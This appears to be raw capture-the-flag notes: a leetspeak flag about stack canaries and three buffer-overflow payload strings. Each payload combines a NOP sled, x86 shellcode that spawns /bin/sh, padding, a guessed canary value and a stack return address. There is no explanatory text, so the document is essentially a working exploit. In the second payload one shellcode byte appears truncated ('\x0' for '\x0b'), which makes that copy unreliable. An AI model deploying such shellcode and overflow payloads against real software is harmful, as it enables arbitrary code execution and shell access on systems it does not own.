feedback C4/\/aR1$_4r3_$h1t
input       "\x90"*200 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xff\xc0\xcd\x80" +"A"*299 +"\x00\xf3\x76\x4c"+"A"*12 +"\x10\xd5\xff\xff"




"\x90"*490+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0\xcd\x80\x31\xc0\xff\xc0\xcd\x80"+"A"*9+"\x00\x53\x52\x7b"+"A"*12+"\x2c\xd3\xff\xff"





"\x90"*400 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xff\xc0\xcd\x80" +"A"*99 +"\x00\xac\x53\xa8"+"A"*12 +"\x10\xce\xff\xff"
